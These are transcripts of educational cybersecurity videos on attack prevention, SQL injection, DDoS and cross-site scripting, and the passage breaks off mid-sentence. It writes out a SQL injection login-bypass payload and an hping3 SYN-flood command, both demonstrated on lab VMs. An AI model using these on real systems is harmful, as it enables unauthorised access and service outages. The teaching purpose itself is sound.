methods to prevent a cyber attack, let's once again have a look at a few personal tips and ways in which you can prevent a cyber attack on the whole. Firstly, it is important you change your passwords regularly, and not only change but use strong passwords that are difficult to crack. Do not have extremely complicated passwords that you would tend to forget. Rather, use a password with at least 8 characters and preferably alphanumeric. Also, keep in mind not to use the same password twice. Next, update both your operating system and applications. This will remove vulnerabilities that hackers tend to exploit. Make use of antivirus protection software, as they prevent malware and other viruses from entering into your device. Use antivirus software from trusted and legitimate vendors only. Make sure to use a firewall, as it will filter the traffic entering your device. Use other network security tools such as intrusion prevention systems, access control, application security, and so on. Fourthly, as mentioned in the earlier section, don't open emails from unknown senders. Scrutinize the emails that you receive and see where it comes from and if there are any grammatical or format errors. Ideally, it is good to make use of a VPN. By doing so, the traffic is encrypted between the VPN server and your device. This proves to be a protection for your device. The next step is that you regularly back up your data. According to many security professionals, it is good to have 3 copies of your data on 2 different types of media and 1 copy in an off-site location like a cloud storage. This way, even if you witness a cyber attack, you can erase your systems and restore with a recently performed backup. Up next is that you should train your employees in cybersecurity principles. They should also be aware of the various cyber threats and know how to tackle them in case of any emergency. The next one is a crucial step, and that is to make sure to use 2-factor or multi-factor authentication. Normally, while logging in, you would enter your user ID and password. But with 2-factor authentication, users are required to provide 2 different authentication factors to verify themselves. It could be an additional personal identification code or maybe even a fingerprint. When you are asked for more than 2 additional authentication methods apart from your username and password, it is termed as a multi-factor authentication. Thus, it proves to be a better step to secure your account. Make sure to always secure your Wi-Fi networks. The next point is that refrain from using public Wi-Fi without using a virtual private network, that is a VPN. Finally, it is also necessary that you safeguard your mobile, as mobiles are also a cyber attack target. For this purpose, install apps from only trusted and legitimate sources. Make sure to keep your device updated. And there you go. Those were a few of the cybersecurity tips and ways to prevent a cyber attack. So we are now done looking at the top 10 cyber threats and the ways to prevent these cyber attacks.
In this video, we are going to discuss SQL injection and the types of SQL injection. This is what is going to be covered in this video. The first point will be, we will be discussing what exactly is SQL injection. Then we'll discuss the types of SQL injection. How does SQL work on a website? So SQL is a structured query language. We'll be discussing that a little bit. And how to prevent SQL injection. We'll be looking at basic pointers on what to utilize so that SQL injection is not possible. And then we'll be looking at a couple of demos during this video on SQL injection. So let's begin with what is SQL injection. As the name suggests, SQL injection vulnerability allows an attacker to inject malicious input into a SQL statement. So SQL stands for Structured Query Language, which is a language used by an application to interact with a database. Now, normally this attack is targeted towards a database to extract the data that is stored within. However, the vulnerability does not lie in the database itself. The vulnerability will always lie in the application. It is the developer's prerogative of how to develop the application, how to configure it to prevent SQL injection queries from happening. A database is created to answer questions, and if a question is asked, it is supposed to answer it. Database needs to be configured for some amount of security, but the vulnerability, the flaw here for SQL injection will always lie in the application itself. It is how the application interacts with the database that needs to be modified, that needs to be maintained by the developer rather than just configuring the database itself. So the attacker at this point in time, when they send a query to the application, will form a malformed query by injecting a particular command or an operator that is recognized by the SQL language. And if that operator is passed through the application to the database, then the database basically gets cracked or does a data dump because of that unwanted character coming in. So this character needs to be filtered at the application level itself. Now let's look at a quick demo. So what we have done here is, I have this virtual machine called OWASP Broken Web Applications Virtual Machine version 1.2. I'm going to power this on. Till this powers on, I'm going to show you where we can download this utility from. So you can just look for OWASP Broken Web Application Project download. You'll find it on sourceforge.net. Click on the link. You can download the Broken Web Application Project from here. This is a 1.9 GB download, and you can have a zip machine directly for VMware or Oracle VirtualBox. Now, this is an application that has been developed by OWASP, which stands for Open Web Application Security Project, which is a not-for-profit organization and periodically releases the most top 10 risks that an application will face for that particular year. So they have given a web application with inbuilt vulnerabilities for professionals like us to practice upon, to develop our skills upon, because doing this in the real world is illegal. I cannot go onto a website to demonstrate how a SQL injection attack works. Neither should you try your hands on it till you become very well rehearsed with it. So to upgrade your skills, to upskill yourself, please download this machine, host it in a VMware workstation or an Oracle VirtualBox, and you can then try your skills on it, right? So just going back to the browser here, if I open up a new tab, you'll see that this machine has booted up and has an IP address called 71.132. So if I just go onto that IP address and I type in 192.168.71.132, and you'll see the OWASP Broken Web Application Project, and there are a lot of training applications, realistic intentionally vulnerable applications, old versions of real applications, and so on and so forth. So there is a lot of applications inbuilt over here that you can try your skills upon. We are going to try to use the OWASP utility over here. This gives you the OWASP top 10 risks for 2010, 2013. 2017 is the latest one so far, but the difference between 2013 and 2017 is that some of these have changed, but not all of them. The order has changed a little bit, but you can see that SQL injection is on the top A1 amongst the injection attacks, right? And you can see there are multiple types that have been given here: the SQL injection for extracting data, or SQL injection for bypass authentication, or insert your injection attacks, blind SQL injection. And then there is a tool called SQL map, which is available freely on your Linux machines, Kali Linux or Parrot Linux, whichever you want to use for your practice targets, and so on and so forth. So if I just take you here for bypass authentication, and this is a regular login page that an application may have, right? You look at a username, you look at password, you type that in, and you log in. So let's say I don't know a password here. I'm just going to type in the username test. Password is PASSWORD. I try to log in, and it shows me that the account does not exist. So the authentication mechanism does work. I did try type in a username and password. It wasn't recognized, so the account does not exist. Now let's try to type in a SQL query. Here I'm going to just give it a single quote, which is an operator that is recognized by the SQL language, which when the database tries to execute will cause the database to dump some data or to bypass authentication in this case. And I'm going to give it a condition, single quote, or 1 equals 1 space hyphen space, and I'm going to click on login. Now right now I'm not logged in at all, and we tried our username and password and we weren't able to log in. So now if I log in, you will see that it gave me a status update saying the user has been authenticated, and I'm logged in as admin, got root. So that is what these SQL queries can achieve. I'm going to log out right now, and we are going to look at the basics of SQL injection. So looking at that small demo, now let's look at what types of SQL injections are available. So the first is in-band SQL injection. There are two subtypes within in-band: error-based injection attack and a union-based injection attack. The second type is blind SQL injection attack, where there's a Boolean-based and a time-based attack. And the third one is out-of-bound SQL injection attack. Now, what is in-band SQL injection attack? In-band is where we are either attempting the error-based or the union-based. What is error-based? We send a query to the database, we craft a query to the database, and it generates an error message, and it dumps the error message right in front of us on the screen. That makes us realize that there is a flaw, and there is some information that is dumped on the screen, which we can then further utilize to craft our further queries as we go ahead. Whereas union-based is it is where we combine multiple statements at the same time. So if you look at the URL, earlier in the URL, you would see a large structure in that URL. We can try to add two or more statements within the URL itself to combine them and then confuse the database into executing both the statements together and giving a data dump at the same time, right? So what would an error-based SQL injection look like? If I go back to the same database, which is here, right? And if you remember the username, we gave it a single quote or 1 equals 1 space hyphen space. We gave it the condition, right? So basically what it did was a single quote is an operator that goes to the database, selects the default table in the user tables in this database column, and then compares it to the condition that is given. So the condition that we gave was 1 equals 1, which is always true. So what it did was it selected the default user table that was available in the database, and instead of comparing it to a password, it compared it to the condition. So if I give it 1 equals 2 where the condition is false, and if I log in, you will see that the account doesn't exist, comes back again because the condition was false, and instead of comparing the user account to the password, it basically compared the user account to the condition. So if I give it a single quote or 1 equals 1 hyphen space and log in, you can see that this is a correct condition, and thus we are able to log in. Now, before we even go to that extent, if I just forget the condition over here and I just give it a single quote, the operator, and I send this operator to the database and I click on login, you will see that it generates an error which is right on top, and it tells us the line, the file where the error happened, and you can see it happened in the MySQL handler.php file, right? And then it gives us the message, you have an error in your SQL syntax, check the manual that corresponds to your MySQL server version for the right syntax to use. Now, why would a hacker want to do this in the first place? Because there are different types of databases. So there is a MySQL, MS SQL or Microsoft SQL, Oracle SQL, IBM DB2. All of these are variations of the SQL database. They use the SQL language. However, every database has its own command, right? They have their own syntax, they have their own specific commands that are utilized for the database. So in this scenario, the hacker wants to identify what database is being currently utilized so they can craft those particular queries. So now with this injection, with just me sending the quote and the error getting generated, I now come to know that we are using a MySQL server and the version of that server is 5.1.73. and the rest of the information about where the handlers are located and so on and so forth. Right, this gives the information to the hacker of how they want to proceed next, what kind of queries they want to create, what kind of syntax they want to utilize. So error-based attack is where you generate these kind of errors and you get this information. The union-based is where you craft your queries within the URL. You can try to combine multiple statements within the input fields and try to generate a response from that. Then we come to Boolean-based SQL injection. Sends a SQL query to the database which forces the application to return a different result depending on whether the query returns a true or a false result. So basically, if the input is false, both the inputs are false, the output would be false. There's one input that is false, the other input that is true, input B, the output would be true, and so on and so forth. Right? So depending on the result from the inputs, the attacker will come to know which input is true. With this, he can then access the database of the website. So you're trying to figure out by sending out multiple inputs and then analyzing the output to see what exactly, which command exactly worked, what was the resultant output of that command. Thus, from this kind of an information, the hacker can infer their next step forward. Then you have time-based SQL injections. Now, there are times when a database administrator or an application administrator has done some security configuration and thus have disabled verbose error messages. Now, what is a verbose error message? The error message that we saw right here is a verbose error message. That means that the message gives out details. The message gives out details about what the database is, the version and whatnot. So if they have sanitized these errors, and you no longer can generate these errors and thus you cannot figure out what database is, then what do you do, right? For example, if I just take you to Simplilearn, and take you to a URL that is supposedly not accessible, you can see that it gives a generic error. Oops, like it looks like you have crash landed on Mars. It doesn't give you a verbose error that we saw here. So this gives us a detailed error of what went wrong, where it gives us the database, the version of the database, and where the query went wrong, and etc, etc, etc. Whereas on this site, where there's a lot of security that goes in here, so you can see that it doesn't generate a error. You just get a generic page in front of you. So in that case, what does a hacker do? So the hacker then injects a time-based query in the URL, which allows us to verify whether the command is being executed or not. So we put in a time wait, let's say 10 seconds of time wait. So if the moment we inject the query, if the query times for 10 seconds and then gets executed, that means that the SQL injection is possible. However, if we inject the query and it just gets executed without the delay, that means that the time injection attack would not be possible on that particular site. Out of bound is not a very common attack. It depends on the features being enabled on the database management system that is being used by the web application. So this can be a somewhat of a misconfiguration error by the database administrator, where you have enabled functions and not sanitized them. So you have not done access controls properly. You have not given account control. So queries should never be executed at an administrative level. They should always be executed at a user level with minimum privileges that are required for that query to be executed. Now, if you're allowing these kind of functions to be enabled at the DBMS, and there is an administrative account that can have access to them, at that point in time an out of bound injection attack is possible. So let's look at how a website works, right? How SQL works on a website. Now, the website is constructed of HTML, hypertext markup language, which would include JavaScripting for functionality, cascading style sheets for the mapping of the website, right? And then React, JS and whatnot for further functionality. Now, when we send a query to the website, it is normally using the HTTP protocol or HTTPS protocol. When the query reaches the application would then go ahead and generate the SQL query. At the client side, you'll have all these scripting languages coming in on the front end that we can utilize to craft queries and then send them across. At the server side, you'll have databases like Oracle, MySQL, MS SQL, and so on and so forth that will then execute those queries, right? So just to give you an example, if I use a tool called Postman, what we generally do when we craft a query is we send out a GET request to the website, and then we receive a response from the site with the HTML code and everything. So this is a tool that is utilized by software testers to test the responses that you're going to get from various websites. So on the left hand side, you can see I've used it on quite a bit. Here we have an example for gmail.com. So let's continue with that. So this is a GET request being sent to Gmail. The moment I send it, it's going to create an HTTP request and send it across. The response that I get is this. This is the HTML code for gmail.com, right? These are the cookies. These are the headers that include information. So you can see this is a text HTML. Character set utilized is UTF-8, and the configuration that has been done with the application, right? So this is where everything comes in. This is the cookie that has been sent with that particular request that I had sent out. Now, if we analyze this query, right? So when we went on to this application and I typed in that single quote and we generated this error, right? You can see that the application converted this into a SQL query. So the query was select username from accounts where the username in quotes, single quotes, and we use the quote, right? The single quote right there. So that's where we use that operator, and that's where the exception error occurred. So these are the kind of queries that are structured by the application and then taken on to the database for execution. When we type in, it is a HTTP GET request with the username and password within that query that is sent to the application. The application converts it into a SQL query, sends it to the database, and the database responds with the appropriate response. So how do we prevent SQL injection in the first place? Use prepared statements and parameterized queries. These statements make sure that the parameters passed into SQL statements are treated in a safe manner. So for example, we saw that the single quote was an operator. This shouldn't be allowed to be utilized in the first place, right? So here, what we are doing here is a secure way of running a SQL query in the JDBC using a parameterized statement. Define which user we want to find. So there's a string, the email comes in. Connection to the database. We are going to figure out how the connection is going to be passed, how it is going to be created. Construct the SQL statement we want to run specifying the parameter, right? So we define how is it going to be created, what is going to be created, what can be passed to the database and what should not be passed to the database. So that is one way of utilizing prepared statements and parameterized queries. Then we have object relational mapping. Most development Teams prefer to use object relational mapping frameworks to make the translation of SQL results set into code objects more seamless. So this is an example of object relational mapping where we map certain objects and allow that to be executed. And then escaping inputs. It is a simple way to protect against most SQL injection attacks. Many languages have standard functions to achieve this. Right, so you need to be very careful while using escape characters in your code base when a SQL statement is constructed. Not all injection attacks rely on abuse of code characters. So you need to know what characters are being utilized in the configuration that you have created, in the structure that you have created, in the code that you have created. Which characters are being recognized as operators. You need to sanitize those operators, and you need to basically ensure that these operators cannot be accepted as user input. If they are, they're weeded out by the application and they never reach the database. Other methods of preventing SQL injection are password hashing, so that passwords cannot be bypassed, the passwords cannot be recovered, passwords cannot be cracked. Third-party authentication, you use OAuth or some other service for a single sign-on mechanism. Thus, you rely on a third party to maintain the security of authentication and what kind of parameters are passed. For example, using LinkedIn logins or Facebook logins, right? For the layman, you normally go onto Facebook and you allow, if you're using a game, right? If you start playing a game, you're allowed to log into the game using your Facebook credentials or your Google credentials. Now that is not just for ease of use, but the game user, the developer, has outsourced the authentication mechanisms to third parties such as Facebook or Google, because they understand that that authentication mechanism is as safe as can be. Facebook and Google are wealthy organizations, hire a lot of security experts, and the development for their authentication mechanisms is top notch. Small organization cannot spend that kind of money on security itself, right? So you use a third-party authentication mechanism to ensure that these kind of attacks may not happen. Then web application firewalls. Having a web application firewall and configuring it properly for SQL injection attacks is one of the sure shot method of mitigating or minimizing the threat in the first place. So at this point in time, you have realized that the application has some vulnerabilities for SQL injection, and instead of recoding or restructuring the application, you want to take the easier way out or the cheaper way out. So what you do is you install a web application firewall and you configure the web application firewall to identify malicious queries and stop them at the firewall level itself, so they never reach the application, and thus the vulnerabilities on the application don't get executed. Buy better software and keep on updating the software. So it's not necessary that once you have a software, you install it, it's going to be safe for life. New vulnerabilities are discovered every day, every hour, and it may so happen what is secure today may be completely insecure tomorrow or the day after, right? So you need to keep on upgrading the software. If there are no upgrades available and the vulnerability still exists, you might want to migrate to a better software and thus ensure that you don't get hacked, right? Always update and use patches. Organizations keep on sending out updates and patches as and when they are released. You need to install them to enhance your security postures. And then continuously monitor SQL statements and databases. Use protocol monitors, use different softwares, use the firewalls to keep on monitoring what kind of queries you're getting. And based on those queries, you want to ensure the inputs and the queries that are creating are not detrimental to the health of the software that you have. So the key takeaways that we have seen here in a nutshell are: what is a SQL injection attack? We have seen the types of SQL injection attack, how it works, and how to prevent SQL injection attack. Now we have done a couple of demos. If you want to know more, please comment in the comment section of this video.
With work from home being the norm in today's era, people spend considerable amount of time on the internet, often without specific measures to ensure a secure session. Apart from individuals, organizations worldwide that host data and conduct business over the internet are always at the risk of a DDoS attack. These DDoS attacks are getting more extreme, with hackers getting easy access to botnet farms and compromised devices. As can be seen in the graph, 3 of the 6 strongest DDoS attacks were launched in 2021, with the most extreme attack occurring just last year in 2020. Lately, cybercriminals have been actively seeking out new services and protocols for amplifying these DDoS attacks. Active involvement with hacked machines and botnets allow further penetration into the consumer space, allowing much more elaborate attack campaigns. Apart from general users, multinational corporations have also had their fair share of problems. GitHub, a platform for software developers, was the target of a DDoS attack in 2018. Widely suspected to be conducted by Chinese authorities, this attack went on for about 20 minutes, after which the systems were brought into a stable condition. It was the strongest DDoS attack to date at the time and made a lot of companies reconsider the security practices to combat such attacks. Even after years of experimentation, DDoS attacks are still at large and can affect anyone in the consumer and corporate space. Hey everyone, this is Vaibhav from Simplilearn, and welcome to this video on what is a DDoS attack. Let's take a look at the topics we will be covering today. We start by learning what is a DDoS attack and how it works on a phase-by-phase level. We learn about the distinct categories in DDoS attacks and the potential aim of hackers when they launch a DDoS attack campaign. We also look at some preventive measures that can be taken to protect oneself from these DDoS attacks. Finally, we have a demonstration of how such attacks can hamper the working of a server system using VMware and Parrot Security operating system. But before moving forward, make sure you are subscribed to the Simplilearn YouTube channel. Don't forget to hit the bell icon to receive updates about more informative videos from our channel. So let's learn more about what is a DDoS attack. A distributed denial of service attack, or DDoS, is when an attacker or attackers attempt to make it impossible for a service to be delivered. This can be achieved by thwarting access to virtually anything: servers, devices, services, networks, applications, and even specific transactions within applications. In a DOS attack, it's one system that is sending the malicious data or requests. A DDoS attack comes from multiple systems. Generally, these attacks work by drowning a system with requests for data. This could be sending a web server so many requests to serve a page that it crashes under the demand, or it could be a database being hit with a high volume of queries. The result is available internet bandwidth, CPU, and RAM capacity become overwhelmed. The impact could range from a minor annoyance from disrupted services to experiencing entire websites, applications, or even entire businesses taking offline. More often than not, these attacks are launched using machines in a botnet. A botnet is a network of devices that can be triggered to send requests from a remote source, often known as the command and control center. The bots in the network attack a particular target, thereby hiding the original perpetrator of the DDoS campaign. But how do these devices come under a botnet? And what are the requests being made to the web servers? Let's learn more about these and how DDoS attacks work. A DDoS attack is a two-phase process. In the first phase, a hacker creates a botnet of devices. Simply put, a vast network of computers are hacked via malware, ransomware, or just simple social engineering. These devices become a part of the botnet, which can be triggered anytime to start bombarding a system or a server on the instruction of the hacker that created the botnet. The devices in these networks are called bots or zombies. In the second phase, a particular target is selected for the attack. When the hacker finds the right time to attack, all the zombies in the botnet network send these requests to the target, thereby taking up all the server's available bandwidth. These can be simple ping requests or complex attacks like SYN flooding and UDP flooding. The aim is to overwhelm them with more traffic than the server or the network can accommodate. The goal is to render the website or service inoperable. There is a lot of wiggle room when it comes to the type of DDoS attack a hacker can go with. Depending on the target's vulnerability, we can choose one of the three broad categories of DDoS attacks. Volume-based attacks use massive amounts of bogus traffic to overwhelm a resource. It can be a website or a server. They include ICMP, UDP, and spoofed packet flood attacks. The size of volume-based attack is measured in bits per second. These attacks focus on clogging all the available bandwidth for the server, thereby cutting the supply short. Several requests are sent to the server, all of which warrant a reply, thereby not allowing the target to cater to the general legitimate users. Next, we have the protocol level attacks. These attacks are meant to consume essential resources of the target server. They exhaust the load balancers and firewalls, which are meant to protect the system against the DDoS attacks. These protocol attacks include SYN floods and Smurf DDoS, among others, and the size is measured in packets per second. For example, in an SSL handshake, server replies to the hello message sent by the hacker, which will be the client in this case, but since the IP is spoofed and leads nowhere, the server gets stuck in an endless loop of sending the acknowledgement without any end in sight. Finally, we have the application level attacks. Application layer attacks are conducted by flooding applications with maliciously crafted requests. The size of application layer attacks is measured in requests per second. These are relatively sophisticated attacks that target the application and operating system level vulnerabilities. They prevent the specific applications from delivering necessary information to users and hog the network bandwidth up to the point of a system crash. Examples of such an attack are HTTP flooding and BGP hijacking. A single device can request data from a server using HTTP POST or GET without any issues. However, when the requisite botnet is instructed to bombard the server with thousands of requests, the database bandwidth gets jammed and it eventually becomes unresponsive and unusable. But what about the reasons for such an attack? There are multiple lines of thought as to why a hacker decides to launch a DDoS attack on unsuspecting targets. Let's take a look at a few of them. The first option is to gain a competitive advantage. Many DDoS attacks are conducted by hacking communities against rival groups. Some organizations hire such communities to stagger their rivals' resources at a network level to gain an advantage in the playing field. Since being a victim of a DDoS attack indicates a lack of security, the reputation of such a company takes a significant hit, allowing the rivals to cover up some ground. Secondly, some hackers launch these DDoS attacks to hold multinational corporations at ransom. The resources are jammed, and the only way to clear the way is if the target company agrees to pay a designated amount of money to the hackers. Even a few minutes of inactivity is detrimental to a company's reputation in the global market, and it can cause a spiral effect, both in terms of market value and product security index. Most of the time, a compromise is reached and the resources are freed after a while. DDoS attacks have also found use in the political segment. Certain activists tend to use DDoS attacks to voice their opinion. Spreading the word online is much faster than any local rally or forum. Primarily political, these attacks also focus on online communities, ethical dilemmas, or even protests against corporations. Let's take a look at a few ways that companies and individuals can protect themselves against DDoS attacks. The company can employ load balancers and firewalls to help protect the data from such attacks. Load balancers reroute the traffic from one server to another in a DDoS attack. This reduces the single point of failure and adds resiliency to the server data. A firewall blocks unwanted traffic into a system and manages the number of requests made at a definite rate. It checks for multiple attacks from a single IP and occasional slowdowns to detect a DDoS attack in action. Early detection of a DDoS attack goes a long way in recovering the data lost in such an event. Once you've detected the attack, you will have to find a way to respond. For example, you will have to work on dropping the malicious DDoS traffic before it reaches your server so that it doesn't throttle and exhaust your bandwidth. Here's where you will filter the traffic so that only legitimate traffic reaches the server. By intelligent routing, you can break the remaining traffic into manageable chunks that can be handled by your cluster resources. The most important stage in DDoS mitigation is where you will look for patterns of DDoS attacks and use those to analyze and strengthen your mitigation techniques. For example, blocking an IP that's repeatedly found to be offending is a first step. Cloud providers like Amazon Web Services and Microsoft Azure, who offer high levels of cybersecurity, including firewalls and threat monitoring software, can help protect your assets and network from DDoS criminals. The cloud also has greater bandwidth than most private networks, so it is likely to fail if under the pressure of increased DDoS attacks. Additionally, reputable cloud providers offer network redundancy, duplicating copies of your data, systems, and equipment, so that if your service becomes corrupted or unavailable due to a DDoS attack, you can switch to a secure access on backed up versions without missing a beat. One can also increase the amount of bandwidth available to a host server being targeted. Since DDoS attacks fundamentally operate on the principle of overwhelming systems with heavy traffic, simply provisioning extra bandwidth to handle unexpected traffic spikes can provide a measure of protection. This solution can prove expensive, as a lot of that bandwidth is going to go unused most of the time. A content delivery network, or a CDN, distributes your content and boosts performance by minimizing the distance between your resources and end users. It stores the cached version of your content in multiple locations, and this eventually mitigates DDoS attacks by avoiding a single point of failure when the attacker is trying to focus on a single target. Popular CDNs include Akamai CDN, Cloudflare, AWS CloudFront, etc. Let's start with our demo regarding the effects of DDoS attacks on a system. For our demo, we have a single device that will attack a target, making it a DOS attack of sorts. Once a botnet is ready, multiple devices can do the same and eventually emulate a DDoS attack. To do so, we will use the virtualization software called VMware with an instance of Parrot Security operating system running. For a target machine, we will be running another VMware instance of a standard Linux distribution known as Linux Lite. In a target device, we can use Wireshark to determine when the attack begins and see the effects of the attack accordingly. This is Linux Lite, which is our target machine, and this is Parrot Security, which is used by the hacker when trying to launch a DDoS attack. This is just one of the distros that can be used. To launch the attack, we must first find the IP address of our target. So to find the IP address, we open the terminal. We use the command ifconfig. And here we can find the IP address. Now remember, we're launching this attack in VMware. Now both the instances of Parrot Security and Linux Lite are being run on my local network. So the address that you can see here is 192.168.72.129, which is a private address. This IP cannot be accessed from outside the network, basically anyone who is not connected to my Wi-Fi. When launching attacks with public servers or public addresses, it will have a public IP address that does not belong to the 192.168 subnet. Once we have the IP address, we can use a tool called hping3. hping3 is an open source packet generator and analyzer for the TCP/IP protocol. To check what are the effects of an attack, we will be using Wireshark. Wireshark is a network traffic analyzer. We can see whatever traffic that is passing through the Linux Lite distro is being displayed over here with the IP address, the source IP, and the destination IP as to where the request is being transferred to. Once we have the DOS attack launched, you can see the results coming over here from the source IP, which will be Parrot Security. Now, to launch the hping3 command, we need to give sudo access to the console, which is the root access. Now, we have the root access for the console. The hping3 command will have a few arguments to go with it, which are, as you can see on the screen, -s and a flood, a -v, -p80, and the IP address of the target, which is 192.168.72.129. In this command, we have a few arguments such as the -s, which specifies SYN packets. Like in an SSL handshake, we have the SYN request that the client sends to the server to initiate a connection. The -flood aims to ignore the replies that the server will send back to the client in response to the SYN packets. Here the Parrot Security OS is the client and Linux Lite being the server. -V stands for verbosity, as in where we will see some output when the requests are being sent. The -P80 stands for port 80, which we can replace the port number if we want to attack a different port. And finally, we have the IP address of our target. As of right now, if we check Wireshark, it is relatively clear and there is no indication of a DDoS attack incoming. Now once we launch the attack over here, we can see the requests coming in from this IP, which is 192.168.72.128. Till now, even the network is responsive, and so is Linux Lite. The requests keep on coming, and we can see the HTTP flooding has started in flood mode. After a few seconds of this attack continuing, the server will start shutting down. Now remember, Linux Lite is a distro that can focus on that serves as a backend. Now remember, Linux Lite is a distro, and such Linux distros are served as backend to many servers across the world. For example, a few seconds have passed from the attack. Now the system has become completely irresponsive. This has happened due to the huge number of requests that came from Parrot Security. You can see whatever I press, nothing is responded. Even the Wireshark has stopped capturing new requests because the CPU usage right now is completely 100%, and at this point of time, anyone who is trying to request some information from this Linux distro, or where this Linux distro is being used as a backend for a server or a database, cannot access anything else. The system has completely stopped responding, and any request, any legitimate request from legitimate users will be dropped. Once we stop the attack over here, it takes a bit of time to settle down. Now remember, it's still out of control, but eventually the traffic dies down and the system regains its strength. It is relatively easy to gauge right now the effect of a DOS attack. Now remember, this Linux Lite is just a VM instance. Actual website servers and web databases, they have much more bandwidth and are very secure, and it is tough to break into. That is why we cannot use a single machine to break into them. That is where a DDoS attack comes into play. What we did right now is a DOS attack, as in a single system is being used to penetrate a target server using a single request. Now, when a DDoS attack, multiple systems such as multiple Parrot Security instances or multiple zombies or bots in a botnet network can attack a target server to completely shut down the machine and drop any legitimate request, thereby rendering the service and the target completely unusable and inoperable. As a final note, we would like to remind that this is for educational purposes only, and we do not endorse any attacks on any domains. Only test this on servers and networks that you have permission to test on. Website security principles have had a thorough overhaul over the past few years. This is primarily due to the ease of access to malicious tools, starting from DDoS attacks to remote code execution. A full-fledged web application security platform will need to check the major culprits like cross-site scripting, one of the riskiest attacks to perform with similar level of rewards when conducted properly. While the attacks from the client side on most occasions, they can be configured to work remotely against most secured platforms as well. Let us go through some of the topics to be covered in today's video on cross-site scripting. We start by learning the basics of cross-site scripting and the formative arguments that go into play when conducting this attack. Next, we take a look at ways a cross-site scripting attack starts and how the hacker leverages vulnerable web applications and systems to infect users and servers alike. Moving on, we read about the three distinct categories of attacks when it comes to cross-site scripting. We then go through some of the industry recommended measures to prevent systems from falling prey to cross-site scripting attacks. And finally, we complete a set of cross-scripting challenges, highlighting the ways hackers think and how a simple line of code can open up vulnerabilities if not configured correctly. Let's start by learning about cross-site scripting from a layman's perspective. Cross-site scripting, also known as XSS, is a type of code injection attack that occurs on the client side. The attacker intends to run harmful scripts in the victim's web browser by embedding malicious code in a genuine web page or online application. The real attack takes place when the victim hits the malicious code-infected web page or online application. The web page or application serves as a vehicle for the malicious script to be sent to the user's browser. Forums, message boards, and online pages that enable comments are vulnerable vehicles that are frequently utilized for cross-scripting assaults. A web page or web application is vulnerable to XSS if the output it creates contains unsanitized user input. The victim's browser must then parse this user input. In VBScript, ActiveX, Flash, and even CSS, cross-site scripting attacks are conceivable. They are nevertheless most ubiquitous in JavaScript, owing to the fact that JavaScript is most important to most browser experiences nowadays. The main purpose of this attack is to steal the other user's identity, be it via cookies, session tokens, and other information. In most of the cases, this attack is being used to steal the other person's cookies. As we know, cookies help us to log in automatically. Therefore, with the stolen cookies, we can log in with other identities. And this is one of the reasons why this attack is considered as one of the riskiest attacks. It can be performed with different client-side programming languages as well. Cross-site scripting is often compared with similar client-side attacks, as client-side languages are mostly being used during this. However, an XSS attack is considered riskier because of its ability to damage even less vulnerable technologies. Most often, this attack is performed with JavaScript and HTML. JavaScript is a programming language that runs on web pages inside your browser. The client-side code adds functionality and interactivity to the web page and is used extensively on all major applications and CMS platforms. Unlike server-side languages such as PHP, JavaScript code runs inside your browser and cannot impact the website for other visitors. It is sandboxed to your own navigator and can only perform actions within your own browser window. While JavaScript is client-side and does not run on the server, it can be used to interact with the server by performing background requests. Attackers can then use these background requests to add unwanted spam content to a web page without refreshing it. They can then gather analytics about the client's browser or perform actions asynchronously. The manner of attack can range in a variety of ways. It can be a single link which the user must click on to initiate a JavaScript piece of code. It can be used to show any piece of images that can be later used as a front-end for malicious code being installed as malware. With the majority of internet users unaware of how metadata works or the ways in which web requests are called, the chances of victims clicking on a redirecting links is far too high. Cross-site scripting can occur on the malicious script executed at the client side using a fake page or even a form that is displayed to the user. On websites with displayed advertisements, malicious emails can also be sent to the victim. These attacks occur when the malicious user finds the vulnerable parts of the website and sends it as appropriate malicious input. Now that we understand the basics of cross-site scripting, let us learn more about how this kind of attack works. In the first place, we have the website or the web browser, which is used to show content to the victim or which is the user in our case. Whenever the user wants to grab some content from the website asks the data from the server. The server provides this information to the website and the web browser, which ultimately reaches the victim. How the hacker comes into play here, it passes on certain arguments to the web browser, which can be then forwarded back to the server or to the user at hand. The entire cross-site scripting attack vector means sending and injecting malicious code or script. This attack can be performed in different ways. Depending on the type of attack, the malicious script may be reflected on the victim's browser or stored in the database and executed every time when the user calls the appropriate function. The main reason for this attack is inappropriate users' input validation, where the malicious input can get into the output. A malicious user can enter a script which will be injected onto the website's code. Then the browser is not able to know if the executed code is malicious or not. Therefore, this malicious script is being executed on the victim's browser or any faked form if that is being displayed for the users. There are many ways to trigger an XSS attack. For example, the execution could be triggered automatically when the page loads or when a user hovers over specific elements of the page like hyperlinks. Potential consequences of cross-site scripting attacks include capturing keystrokes of a user, redirecting a user to malicious websites, running web browser-based exploits, obtaining cookie information of a user who is logged into a website, and many more. In some cases, cross-site scripting attack leads to complete compromise of the victim's account. Attackers can trick users into entering credentials on a fake form, which can then provide all information to the attacker. With the basic working of a cross-site scripting attack out of the way, let us go over the different ways hackers can leverage vulnerable web applications to gather information and eventually breach those systems. The prime purpose of performing XSS attack is to steal the other person's identity. As mentioned, it may be cookies, session tokens, etc. XSS may also be used to display fake pages or forms for the victim. However, this can be performed in several ways. We have a reflected attack. This attack occurs when a malicious script is not being saved on the web server but is reflected in the website results. Reflected XSS code is not being saved permanently. In this case, the malicious code is being reflected in any website result. The attack code can be included in the faked URL or in the HTTP parameters. It can affect the victim in different ways, by displaying fake malicious page or by sending a malicious email. In a reflected cross-site scripting example, the input of a search form is reflected on the page to show what the search key was. An attacker may craft a URL that contains malicious code and then spread the same URL via email or social media. A user who clicks on this link opens the valid web application, which then runs the malicious code in the browser. This script is not stored in the web application, and malicious code is shown only to one user. The user that opens the link executes the script, and the attack is not necessarily visible on the server side or to the app owner itself. The next variant is the stored cross-site scripting attacks. This occurs when a malicious script is being saved on the web server permanently. This can be considered a riskier attack since it has leverage for more damage. In this type of attack, the malicious code or script is being saved on the server, for example in the database of the website. It is executed every time the users call the appropriate functionality. This way, stored XSS attack can affect many users. Also, as the script is being stored on the web server, it will affect the website for a longer time. In order to perform stored XSS attack, the malicious scripts should be sent through the vulnerable input form. For example, can be a comment field or a review field. This way, the appropriate script will be saved in the database and evaluated on the page load or appropriate function calling. In a stored XSS example, the script might have been submitted via an input field to the web server, which did not perform a sufficient validation and stores the script permanently in the database. The consequence of this might be that this script is now being delivered to all users visiting the web application and, for example, able to gain access to the user session cookies. In this attack, the script is permanently stored in the web app. The users visiting the app after the information retrieve the script. The malicious code then exploits the flaws in the web application, and the script and the attack is visible on the server side or to the app owner as well. The third variant is DOM-based cross-site scripting attacks. This type of attack occurs when the DOM environment is being changed, but the client-side code does not change. When the DOM environment is being modified in the victim's browser, the client-side code 